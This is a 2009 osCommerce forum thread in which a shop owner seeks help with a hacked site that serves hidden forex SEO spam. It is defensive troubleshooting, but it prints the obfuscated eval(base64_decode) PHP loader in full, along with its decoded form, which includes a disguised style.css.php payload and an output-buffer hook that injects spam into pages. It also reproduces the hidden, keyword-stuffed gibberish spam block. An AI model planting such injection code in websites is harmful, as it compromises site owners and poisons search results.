Guest Posted October 28, 2009 Posted October 28, 2009 Hello Everyone: I recently downloaded the Free version of Web SEO to optimize my website to obtain better search engine placement on the the web and to hopefully gain that coveted Top-10 ranking. Unfortuanly, my present placement in the search engine listing is almost none existant. When I anylized my site both using Web SEO and Google Webmaster Tools I have a whole bunch of "keywords" showing up on my index page that have nothing to do with my website and that I DID NOT put in there myself. This stuff is displayed or catagorized as "Visable Text" although it can't be seen on my webpage?*@# I don't know how that can be. I have looked in my index.php files with the osCommerce Online Merchant Tools section and CAN NOT find the afformentioned text or code anywhere so I can delete it. The text showing up on my index page as "Visable Text" according to Web SEO and Google Webmaster Tools is as follows: (day trade forex easy forex com fx trading forex learn trade forex future forex trading automatic forex trading free forex trading course free forex training forex trading system software forex trading review forex trade system forex software system trading forex fx trading forex future trading forex free training forex foreign currency forex exchange rates forex demo account forex capital markets foreign currency forex day trading forex currency broker currency forex forex charting software forex currency broker forex foreign currency trading forex mini account forex online option trading forex online trade forex signal software forex signals free forex trade online forex trading hours forex trading tips free forex signals automated forex system online forex trade free signals forex currency foreign forex trading currency day forex trading genuine online trading forex genuine online forex trading trade forex online currency forex market currency rate forex spot forex trading online forex training forex affiliate program forex currency converter forex currency rate forex futures trading). It would appear that my website has benn 'hacked' and someone planted this keyword saturation on my website to in an attempt to drive traffic to there site and it is probably responsible for my website's rankings getting lower and lower no matter what I do. This leads to the questions: 1). How to I find or view this code that has been embedded into my webpage? 2). How did this happen and how do I prevent it in the future? 3). How do I GET RID OF IT? Is there a recommended HTML editor that people recommend for finding and editing my pages to weed out such code. Thanks in advance for anyone's help and advice. Peace, Jeff
spooks Posted October 28, 2009 Posted October 28, 2009 I sorry to have to say, yes, you have been hacked, and its a nasty one, I hope you have backups. For info on the hack see http://www.oscommerce.com/forums/topic/344272-did-someone-hack-my-site-eval-base64-decode/ For some ways to fix see http://www.oscommerce.com/forums/topic/345957-evalbase64-decode-hack/ And what to do once your back up & running so it wont happen again http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al.
Guest Posted October 28, 2009 Posted October 28, 2009 Question I have one question. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this? Yes, this appears to be the case from what I have read so far. I have had that eval dbase64 code in all of my pages for a while now but didn't know what it was and my page ranking took a big dive. The site runs fine except for my page ranking being almost none-existant now compared to before I started optimizing it. I am totally unfamiliar with dbase code and code editors to decode this crap and figure out what to look for as far as the main trojan goes. Any suggestions. :( This is the code on my page with the php tags removed: /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9qYW1za2F0ZS9wdWJsaWNfaHRtbC9zaG9wL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lc3Bhbm9sL2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9qYW1za2F0ZS9wdWJsaWNfaHRtbC9zaG9wL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lc3Bhbm9sL2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));
Guest Posted October 28, 2009 Posted October 28, 2009 Additionally, my last database backup (lazy ass) was on 02/27/09. I don't know if in this case if this will work to my advantage. However, I suppose if I hit Restore that I will lose all of the changes that I have made to my website since including all of the new products that I have added to my store since that date. :'(
burtonsnow8 Posted October 28, 2009 Posted October 28, 2009 Additionally, my last database backup (lazy ass) was on 02/27/09. I don't know if in this case if this will work to my advantage. However, I suppose if I hit Restore that I will lose all of the changes that I have made to my website since including all of the new products that I have added to my store since that date. Yes you will lose all of the new products and any information that is stored in the database (which is just about everything). take a look here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ Also, make sure to delete the unknown files in the following directories: shop/admin/includes/languages/espanol/images/buttons/
Guest Posted October 28, 2009 Posted October 28, 2009 I sorry to have to say, yes, you have been hacked, and its a nasty one, I hope you have backups. For info on the hack see http://www.oscommerce.com/forums/topic/344272-did-someone-hack-my-site-eval-base64-decode/ For some ways to fix see http://www.oscommerce.com/forums/topic/345957-evalbase64-decode-hack/ And what to do once your back up & running so it wont happen again http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ I have tried that base 64 decoder you suggested but it won't work for me. It keeps coming back with errors like bad text string or it doesn't recognized some code in the string. So that isn't exactly very helpful. Suggestions.
burtonsnow8 Posted October 29, 2009 Posted October 29, 2009 I have tried that base 64 decoder you suggested but it won't work for me. It keeps coming back with errors like bad text string or it doesn't recognized some code in the string. So that isn't exactly very helpful. Suggestions. only input the actual code, not this stuff: /**/eval(base64_decode(' ')); So all that random stuff in the middle is the only stuff you want to paste. In my post above I have pointed out where the infected files are being stored. *edit* another way you can view the code is by replace eval with echo and placing it in a new file to view.
spooks Posted October 29, 2009 Posted October 29, 2009 You must decode just the content, the code you posted decodes too: if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/jamskate/public_html/shop/admin/includes/languages/espanol/images/buttons/style.css.php')){include_once('/home/jamskate/public_html/shop/admin/includes/languages/espanol/images/buttons/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}} That means look for files in '/home/jamskate/public_html/shop/admin/includes/languages/espanol/images/buttons/ Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al.
Guest Posted October 29, 2009 Posted October 29, 2009 You must decode just the content, the code you posted decodes too: if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/jamskate/public_html/shop/admin/includes/languages/espanol/images/buttons/style.css.php')){include_once('/home/jamskate/public_html/shop/admin/includes/languages/espanol/images/buttons/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}} That means look for files in '/home/jamskate/public_html/shop/admin/includes/languages/espanol/images/buttons/ Okay. I'll try again with what you've taught me and what I've read. I'm not expert in php. I hardly know what I'm looking at other than the beginning and ending tags. So, if I go to the file locations mentioned above, what do I delete. The code mentioned above or just the base64 code at the top of the pages. I'm not sure what code is generating the code in all of the php files that I am supposed to look for and delete. Does anyone have a spare Valium? I'm gonna need one in a minute. Thanks for all the help. Jeff
Guest Posted October 29, 2009 Posted October 29, 2009 Okay, I located the folder that file mentioned in the base 64 code that you decoded (style.css). The whole folder contains nothing but base64 code. I deleted all of it out of the folder but not the folder itself. I don't know what is supposed to go in that folder if there are important files that need to be in there or where to get it from. There are a bunch of other files that may be files that are not supposed to be in there but I am not sure which ones or if I am supposed to delete the files entirly or just the contents. I am posting the name and contents of one of the files that appears to be what is showing up as visable body text and is showing up as keywords saturating my website. File Name: eca8358e7e8f959a63baaad7a31664dd Contents: <div style="display:none"><!--627424014--><strong>Signal</strong> grew as to ideas wednesday had several his newsman, squirrels he was negotiable servitude a questionnaires postings or all of the starkly.<!--856368197--> She abused annoyed <u>forex day trading training</u> on average my upside and my convicts, purity on decay crafty excellent steak with me at the titled dinero ballast and lifestyles player overloaded passing the punting.<!--457431852--> One dictated <em>currency forex learn online trading</em> that holiday lampoon stagflation to likening the endorsers of charmed or forked, and how forth to scholars in that reeves.<!--160293196--> This <em>forex analysis software</em> is one of the sellable scorpions booths told in universe near determinants on the boon of fixture.<!--366849882--> In the <u>forex</u> conferees, segregate are organizational to arraignment consistently leading contracts when workshop are abroad, and elam are risque to atlas overtly refinery when guillotine are low.<!--931114826--> As we <b>signal forex</b> semantic, evoked to paycheck, we can no hopefully frequently commodity a anywhere zeros, we deserted ranks a baltimore from god.<!--691431684--> Horrible <strong>forex software trader</strong> divergence, phenomenal adelaide miller and doubtful ethanol herring to commons all of us impulsey and tiring.<!--530343724--> <b>Forex trading signal</b> the tests are an friedman, wholly are secondly peculiarly ferdinand functionally the copes of the sesame.<!--696524852--> <i>Forex economic calendar</i> is not elect in the incorporate tear nor is the heavenly slaves twice spread as regularly liston.<!--519479714--> Military sex conveniently convertible of trapped discouraged tits <em>day trading forex currency</em> of hot moms stellar a returns centric hide melting tenured definitions.<!--254166892--> We <b>feed forex news</b> to racketeering the unreliable notepad of complex differentially represented shredded disclosed tableware fish fairly as the cbc, nfb, tvo, etc.<!--750000686--> His <i>forex online account</i> of gate and his scum to his perspective curitiba that he vaduz dictates a obligatory redistribution on kleenex.<!--24278950--> Best the fore disjunctive <em>forex account</em> graphs florentine to innocents shield is the automobiles of premises an means from ventilation commodity and balloon that temperatures not.<!--741179581--> Big paw <b>free forex charts</b> vegas pet fallout and pet approach swindle freeze land to all pets and pet scrutinys sideways!<!--69774340--> I cum on thwarted to a <em>trading</em> baptist informations infinitely harsh courageous cum her tonight gay authentic endeavour tour restraint the cum purchases of her seemingly innocence sex and.<!--298416875--> I <i>forex usd eur</i> a nearest beverages integrating that uplifted elderly parsons closer has not misdemeanor if not been a emeralds to tightly londons of george.<!--669562275--> They financial they were <strong>charts free</strong> a guam doctrine with a downgrade bright them and the montagu, and were not in any harassment.<!--549469915--> </div>
spooks Posted October 29, 2009 Posted October 29, 2009 eca8358e7e8f959a63baaad7a31664dd is not an osC file. Download the nearest version to your store (if its a template get it from where you bought it from) I would suspect your site is a 2.2MS2 version, there is a post in tips to say how to find what version you have. unzip the files onto your pc then compare the contents of those folders with the same on your site with ftp. Of course any add-ons you have added may have added files that wont be in the default package. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.